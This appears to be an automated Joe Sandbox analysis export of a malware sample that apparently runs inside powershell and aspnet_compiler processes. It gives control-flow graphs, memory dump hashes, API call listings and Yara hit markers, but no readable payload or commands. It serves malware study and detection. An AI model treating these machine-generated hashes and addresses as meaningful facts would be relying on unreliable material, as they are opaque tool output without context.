                                                                                                                                                          control_flow_graph 1170 7a400f0-7a40115 1172 7a4028d-7a402a6 1170->1172 1173 7a4011b-7a40120 1170->1173 1180 7a402af-7a402b2 1172->1180 1181 7a402a8-7a402aa 1172->1181 1174 7a40122-7a40128 1173->1174 1175 7a40138-7a40144 1173->1175 1176 7a4012c-7a40136 1174->1176 1177 7a4012a 1174->1177 1183 7a4023a-7a40244 1175->1183 1184 7a4014a-7a4014d 1175->1184 1176->1175 1177->1175 1182 7a402b3-7a402d3 1180->1182 1181->1182 1186 7a402ac-7a402ad 1181->1186 1187 7a402d9-7a402de 1182->1187 1188 7a4042a-7a40434 call 7a40439 1182->1188 1190 7a40246-7a4024f 1183->1190 1191 7a40252-7a40258 1183->1191 1184->1183 1189 7a40153-7a4015a 1184->1189 1186->1180 1194 7a402f6-7a402fa 1187->1194 1195 7a402e0-7a402e6 1187->1195 1189->1172 1196 7a40160-7a40165 1189->1196 1192 7a4025e-7a4026a 1191->1192 1193 7a4025a-7a4025c 1191->1193 1197 7a4026c-7a4028a 1192->1197 1193->1197 1202 7a403d7-7a403e1 1194->1202 1203 7a40300-7a40302 1194->1203 1198 7a402e8 1195->1198 1199 7a402ea-7a402f4 1195->1199 1200 7a40167-7a4016d 1196->1200 1201 7a4017d-7a40181 1196->1201 1198->1194 1199->1194 1208 7a40171-7a4017b 1200->1208 1209 7a4016f 1200->1209 1201->1183 1212 7a40187-7a40189 1201->1212 1205 7a403e3-7a403ec 1202->1205 1206 7a403ef-7a403f5 1202->1206 1210 7a40304-7a40310 1203->1210 1211 7a40312 1203->1211 1214 7a403f7-7a403f9 1206->1214 1215 7a403fb-7a40407 1206->1215 1208->1201 1209->1201 1218 7a40314-7a40316 1210->1218 1211->1218 1219 7a40199 1212->1219 1220 7a4018b-7a40197 1212->1220 1221 7a40409-7a40427 1214->1221 1215->1221 1218->1202 1223 7a4031c-7a40320 1218->1223 1224 7a4019b-7a4019d 1219->1224 1220->1224 1227 7a40340 1223->1227 1228 7a40322-7a4033e 1223->1228 1224->1183 1229 7a401a3-7a401a5 1224->1229 1232 7a40342-7a40344 1227->1232 1228->1232 1230 7a401a7-7a401ad 1229->1230 1231 7a401bf-7a401c8 1229->1231 1234 7a401b1-7a401bd 1230->1234 1235 7a401af 1230->1235 1243 7a401e0-7a40237 1231->1243 1244 7a401ca-7a401d0 1231->1244 1232->1202 1236 7a4034a-7a4035d 1232->1236 1234->1231 1235->1231 1248 7a40363-7a40365 1236->1248 1245 7a401d4-7a401d6 1244->1245 1246 7a401d2 1244->1246 1245->1243 1246->1243 1249 7a40367-7a4036d 1248->1249 1250 7a4037d-7a403d4 1248->1250 1251 7a40371-7a40373 1249->1251 1252 7a4036f 1249->1252 1251->1250 1252->1250
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2fa8e5ba0484f636d3737accc2c8fc9815d0303cf0b4d33ca694bcd7c2301436
                                                                                                                                                          • Instruction ID: 72489ef6c3371e9e0c54e031170310784ad7e86499bafe6537d05ae868bf487e
                                                                                                                                                          • Opcode Fuzzy Hash: 2fa8e5ba0484f636d3737accc2c8fc9815d0303cf0b4d33ca694bcd7c2301436
                                                                                                                                                          • Instruction Fuzzy Hash: 9C81F3B1B00206CFDB289B79C54066BBBF5AFC5210F1480FAC769CB291EB32D845E791
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eaa84300fcd9fc48741127cdd4f45516fb5e62e5c49d0dffe13c2f51d1db66c4
                                                                                                                                                          • Instruction ID: e11dc89c2e8d62a06b4921009c6a55abd5ae72d643f384badaea9e488f55b46e
                                                                                                                                                          • Opcode Fuzzy Hash: eaa84300fcd9fc48741127cdd4f45516fb5e62e5c49d0dffe13c2f51d1db66c4
                                                                                                                                                          • Instruction Fuzzy Hash: 473100F16053069FDB208F24841076B7BB0AFC1644F1980F7DA25DB292EB36C981E776
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9c925a2c76dd0f1035659374d2fc56d2ab4095f455bdbd849fc2379e7463008b
                                                                                                                                                          • Instruction ID: b47738a54c1e6069e2ef85c58022f66bd93c2a312606a178ee2c103dddc393ae
                                                                                                                                                          • Opcode Fuzzy Hash: 9c925a2c76dd0f1035659374d2fc56d2ab4095f455bdbd849fc2379e7463008b
                                                                                                                                                          • Instruction Fuzzy Hash: A731F8F4A0034EDFCB298F29C5406A57BF5EFC2211F2981A6D8258B156E737D9C1CB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 49e15c3e36ba6e023055d73365cfef98bdaa88b53c57b2f882590946684b49f5
                                                                                                                                                          • Instruction ID: 90c85525f9e31ce62660cbff82cff813505684351e25f165524ccde7b37f386b
                                                                                                                                                          • Opcode Fuzzy Hash: 49e15c3e36ba6e023055d73365cfef98bdaa88b53c57b2f882590946684b49f5
                                                                                                                                                          • Instruction Fuzzy Hash: 5F31B4B1A0420ADFDB24DB65C444765BBF1BFC5214F0880A7D569CB291D732CC85C791
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e8bc6e9cb4dd6b74239abe6bd8f730e6e3224e65856c430154bd8cbfb1bbc349
                                                                                                                                                          • Instruction ID: e6f22b130cad2351bace566104e66156e188f4a614fdbfb9c40db48a41f08ec6
                                                                                                                                                          • Opcode Fuzzy Hash: e8bc6e9cb4dd6b74239abe6bd8f730e6e3224e65856c430154bd8cbfb1bbc349
                                                                                                                                                          • Instruction Fuzzy Hash: 3E01BC5110E3C18FD3039B3498641D1BF70AE9B25070E06D3C081CF2ABDA2A4D49C7E2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2439652286.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_317d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f4e68b149d4eeb2053af057141133faa3f9628fa9675fb340a24136d42b2c2f
                                                                                                                                                          • Instruction ID: b065dccbeff518480bd9a4eaeb8783fd5331cb04f0c87259808e11feaa3791dc
                                                                                                                                                          • Opcode Fuzzy Hash: 7f4e68b149d4eeb2053af057141133faa3f9628fa9675fb340a24136d42b2c2f
                                                                                                                                                          • Instruction Fuzzy Hash: 2301F271404348DBE7148E25E984B67FFA8EF49324F1CD05AED080A242CBB89881CAB1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2439652286.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_317d000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c58a6b93d9102b50f1b165cd97d9f3a4b3c07517c56d3fb41410e932b6e9a142
                                                                                                                                                          • Instruction ID: da68d4534c37c57e9ec1c26d8317f0913b76df9254f9bcea4b5650578adc1f0a
                                                                                                                                                          • Opcode Fuzzy Hash: c58a6b93d9102b50f1b165cd97d9f3a4b3c07517c56d3fb41410e932b6e9a142
                                                                                                                                                          • Instruction Fuzzy Hash: 5201407240E3C49FE7128B25D894B52BFB4EF47224F1D81CBD9888F1A3C2695848CB72

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:1.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                          Signature Coverage:8.3%
                                                                                                                                                          Total number of Nodes:145
                                                                                                                                                          Total number of Limit Nodes:14
                                                                                                                                                          execution_graph 92912 424243 92913 42425f 92912->92913 92914 424287 92913->92914 92915 42429b 92913->92915 92916 42bda3 NtClose 92914->92916 92922 42bda3 92915->92922 92918 424290 92916->92918 92919 4242a4 92925 42def3 RtlAllocateHeap 92919->92925 92921 4242af 92923 42bdc0 92922->92923 92924 42bdce NtClose 92923->92924 92924->92919 92925->92921 93028 42b413 93029 42b42d 93028->93029 93032 1092df0 LdrInitializeThunk 93029->93032 93030 42b452 93032->93030 93033 4245d3 93037 4245ec 93033->93037 93034 424637 93035 42ddd3 RtlFreeHeap 93034->93035 93036 424647 93035->93036 93037->93034 93038 424677 93037->93038 93040 42467c 93037->93040 93039 42ddd3 RtlFreeHeap 93038->93039 93039->93040 93041 42ef93 93042 42efa3 93041->93042 93043 42efa9 93041->93043 93046 42deb3 93043->93046 93045 42efcf 93049 42c0a3 93046->93049 93048 42dece 93048->93045 93050 42c0bd 93049->93050 93051 42c0cb RtlAllocateHeap 93050->93051 93051->93048 92926 41ab83 92927 41abc7 92926->92927 92928 41abe8 92927->92928 92929 42bda3 NtClose 92927->92929 92929->92928 92930 4133a3 92931 4133c2 92930->92931 92933 42c013 92930->92933 92934 42c030 92933->92934 92937 1092c70 LdrInitializeThunk 92934->92937 92935 42c055 92935->92931 92937->92935 93052 41dd53 93053 41dd79 93052->93053 93059 41de79 93053->93059 93061 42f0c3 93053->93061 93055 41de11 93056 41de70 93055->93056 93057 42b463 LdrInitializeThunk 93055->93057 93055->93059 93056->93059 93067 428203 93056->93067 93057->93056 93060 41df2b 93062 42f033 93061->93062 93063 42deb3 RtlAllocateHeap 93062->93063 93064 42f090 93062->93064 93065 42f06d 93063->93065 93064->93055 93066 42ddd3 RtlFreeHeap 93065->93066 93066->93064 93068 428268 93067->93068 93069 4282a3 93068->93069 93072 418413 93068->93072 93069->93060 93071 428285 93071->93060 93073 4183d6 93072->93073 93074 42c123 ExitProcess 93073->93074 93076 418462 93073->93076 93075 4183fb 93074->93075 93075->93071 93076->93071 93077 413913 93078 41392d 93077->93078 93083 417063 93078->93083 93080 41394b 93081 413990 93080->93081 93082 41397f PostThreadMessageW 93080->93082 93082->93081 93085 417087 93083->93085 93084 41708e 93084->93080 93085->93084 93086 4170c3 LdrLoadDll 93085->93086 93087 4170da 93085->93087 93086->93087 93087->93080 93088 418615 93089 418619 93088->93089 93090 42bda3 NtClose 93089->93090 93091 41861f 93090->93091 92938 401ae8 92939 401afe 92938->92939 92942 42f463 92939->92942 92945 42d993 92942->92945 92946 42d9b9 92945->92946 92957 407263 92946->92957 92948 42d9cf 92956 401b72 92948->92956 92960 41a993 92948->92960 92950 42d9ee 92951 42da03 92950->92951 92975 42c123 92950->92975 92971 427b13 92951->92971 92954 42da1d 92955 42c123 ExitProcess 92954->92955 92955->92956 92978 415d33 92957->92978 92959 407270 92959->92948 92961 41a9bf 92960->92961 93002 41a883 92961->93002 92964 41aa04 92966 41aa20 92964->92966 92969 42bda3 NtClose 92964->92969 92965 41a9ec 92967 41a9f7 92965->92967 92968 42bda3 NtClose 92965->92968 92966->92950 92967->92950 92968->92967 92970 41aa16 92969->92970 92970->92950 92972 427b74 92971->92972 92974 427b81 92972->92974 93013 417ed3 92972->93013 92974->92954 92976 42c140 92975->92976 92977 42c14e ExitProcess 92976->92977 92977->92951 92979 415d4d 92978->92979 92981 415d63 92979->92981 92982 42c7a3 92979->92982 92981->92959 92984 42c7bd 92982->92984 92983 42c7ec 92983->92981 92984->92983 92989 42b463 92984->92989 92990 42b47d 92989->92990 92996 1092c0a 92990->92996 92991 42b4a6 92993 42ddd3 92991->92993 92999 42c0e3 92993->92999 92995 42c859 92995->92981 92997 1092c1f LdrInitializeThunk 92996->92997 92998 1092c11 92996->92998 92997->92991 92998->92991 93000 42c0fd 92999->93000 93001 42c10b RtlFreeHeap 93000->93001 93001->92995 93003 41a979 93002->93003 93004 41a89d 93002->93004 93003->92964 93003->92965 93008 42b4f3 93004->93008 93007 42bda3 NtClose 93007->93003 93009 42b50d 93008->93009 93012 10935c0 LdrInitializeThunk 93009->93012 93010 41a96d 93010->93007 93012->93010 93014 417ef5 93013->93014 93020 4183fb 93014->93020 93021 413583 93014->93021 93016 418024 93017 42ddd3 RtlFreeHeap 93016->93017 93016->93020 93018 41803c 93017->93018 93019 42c123 ExitProcess 93018->93019 93018->93020 93019->93020 93020->92974 93022 4135a3 93021->93022 93024 41360c 93022->93024 93026 41aca3 RtlFreeHeap LdrInitializeThunk 93022->93026 93024->93016 93025 413602 93025->93016 93026->93025 93027 1092b60 LdrInitializeThunk

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 367 417063-41708c call 42ead3 370 417092-4170a0 call 42f0d3 367->370 371 41708e-417091 367->371 374 4170b0-4170c1 call 42d463 370->374 375 4170a2-4170ad call 42f373 370->375 380 4170c3-4170d7 LdrLoadDll 374->380 381 4170da-4170dd 374->381 375->374 380->381
                                                                                                                                                          APIs
                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004170D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                          • Opcode ID: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                                                                                                                          • Instruction ID: d2bdfe92a6df6b11a72e1f8b55d3ed58340993e138cd653c837ef381cf487159
                                                                                                                                                          • Opcode Fuzzy Hash: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                                                                                                                          • Instruction Fuzzy Hash: 000171B5E0020DBBDF10DBE1DC42FDEB778AB14308F0081AAE90897241F675EB488B95

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 392 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                                                                                                                          APIs
                                                                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                                                                                                          • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                                                                                                                          • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                                                                                                                          • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 406 1092b60-1092b6c LdrInitializeThunk
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 03c8ec45442551ed11e10db14dfd38268ea1c01d4ecbf635949b1bdce23b7145
                                                                                                                                                          • Instruction ID: 701cc439648640bcd50dbb1bccccd87c5ea09a79e74f4f0cfb8fa84be18d315e
                                                                                                                                                          • Opcode Fuzzy Hash: 03c8ec45442551ed11e10db14dfd38268ea1c01d4ecbf635949b1bdce23b7145
                                                                                                                                                          • Instruction Fuzzy Hash: 319002A170240003510571D88424616400A97F0202B95C022E1414590DC52589916225
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: f23dffdd4801eff1eb6134a9b067749a5be8b6def2016637fddc8b534bd90381
                                                                                                                                                          • Instruction ID: 33e2c73397ced17bc0443409e8b61743bceb7efe6e037393c876dc5671798c28
                                                                                                                                                          • Opcode Fuzzy Hash: f23dffdd4801eff1eb6134a9b067749a5be8b6def2016637fddc8b534bd90381
                                                                                                                                                          • Instruction Fuzzy Hash: E390027170140413E11171D88514707000997E0242FD5C413A0824558DD6568A52A221

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 407 1092c70-1092c7c LdrInitializeThunk
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 453d20a1506ceace8b23fd9f033838ba5677778f477f03a3034f445e98c469bd
                                                                                                                                                          • Instruction ID: d855d5e1fb7fcf5fe447174ceef7af2c77387e77e4de9dc82683c18180f7d290
                                                                                                                                                          • Opcode Fuzzy Hash: 453d20a1506ceace8b23fd9f033838ba5677778f477f03a3034f445e98c469bd
                                                                                                                                                          • Instruction Fuzzy Hash: CB90027170148802E11071D8C41474A000597E0302F99C412A4824658DC69589917221
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 1d64c7ee6e7c99841a3f853d22680382b356cfb870881920ac64ece676ebd115
                                                                                                                                                          • Instruction ID: d5bbee6b1d4b11d326a95712044f73b488a55cba609acddc10d040620d6153e1
                                                                                                                                                          • Opcode Fuzzy Hash: 1d64c7ee6e7c99841a3f853d22680382b356cfb870881920ac64ece676ebd115
                                                                                                                                                          • Instruction Fuzzy Hash: 0E900271B0550402E10071D88524706100597E0202FA5C412A0824568DC7958A5166A2

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 0-367025745
                                                                                                                                                          • Opcode ID: 28ee5cd632557669d2dd44e848351ed38fea0fc8904c636a7d43641d639951a5
                                                                                                                                                          • Instruction ID: 4648e5c59407577b98a54ef4615caafe9cf6d06a91d48ed6396808800c5f6b04
                                                                                                                                                          • Opcode Fuzzy Hash: 28ee5cd632557669d2dd44e848351ed38fea0fc8904c636a7d43641d639951a5
                                                                                                                                                          • Instruction Fuzzy Hash: 47216EB2A0011C7ADB11EFE5AC81AEF7BACDF41369B05406AF944A7200D66D4F4687E5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 22 413913-413925 23 41392d-41397d call 42e883 call 417063 call 404503 call 4246f3 22->23 24 413928 call 42de73 22->24 33 41399d-4139a3 23->33 34 41397f-41398e PostThreadMessageW 23->34 24->23 34->33 35 413990-41399a 34->35 35->33
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(N78Im7H,00000111,00000000,00000000), ref: 0041398A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 1836367815-367025745
                                                                                                                                                          • Opcode ID: 6e9e158bc232b550949e5263d5508b52ec7a034c4804832ec4e49465489be997
                                                                                                                                                          • Instruction ID: 6d1566f69ca9e366af65c351ff72e1759d8cd6f1b82bc289e82513ea6d8c4bcc
                                                                                                                                                          • Opcode Fuzzy Hash: 6e9e158bc232b550949e5263d5508b52ec7a034c4804832ec4e49465489be997
                                                                                                                                                          • Instruction Fuzzy Hash: E501A1B1D0021C7AEB10AAA59C82DEF7B7CDF41698F058069FA5467241D6BC4F0687A5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 36 4139ad-4139ae 37 4139b0-4139b9 36->37 38 41397c 36->38 43 4139bb-4139bf 37->43 39 41399d-4139a3 38->39 40 41397f-41398e PostThreadMessageW 38->40 40->39 42 413990-41399a 40->42 42->39 44 4139c1-4139c6 43->44 45 4139dd-4139e3 43->45 44->45 47 4139c8-4139cd 44->47 45->43 46 4139e5-4139e8 45->46 47->45 48 4139cf-4139d6 47->48 49 4139e9-4139ec 48->49 50 4139d8-4139db 48->50 50->45 50->49
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(N78Im7H,00000111,00000000,00000000), ref: 0041398A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 1836367815-367025745
                                                                                                                                                          • Opcode ID: 95fd0b10b958885f51afd5d5c787161506a02b07ac4977fe527e9bc6dfa6409f
                                                                                                                                                          • Instruction ID: 7c822b42a908f8d86cc350d6eef1b7e316cc8cf0ce2d5fa5375f74fd3ec7ff18
                                                                                                                                                          • Opcode Fuzzy Hash: 95fd0b10b958885f51afd5d5c787161506a02b07ac4977fe527e9bc6dfa6409f
                                                                                                                                                          • Instruction Fuzzy Hash: C2F049B262060C29E7215D780C85DF7770C8A09236B0443ABE664863E2D2969EC1C758

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 387 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                                                                                                                          • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 382 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                                                                                                                          • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 397 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                                                                                                                          APIs
                                                                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,53CBBDCC,?,?,53CBBDCC), ref: 0042C157
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
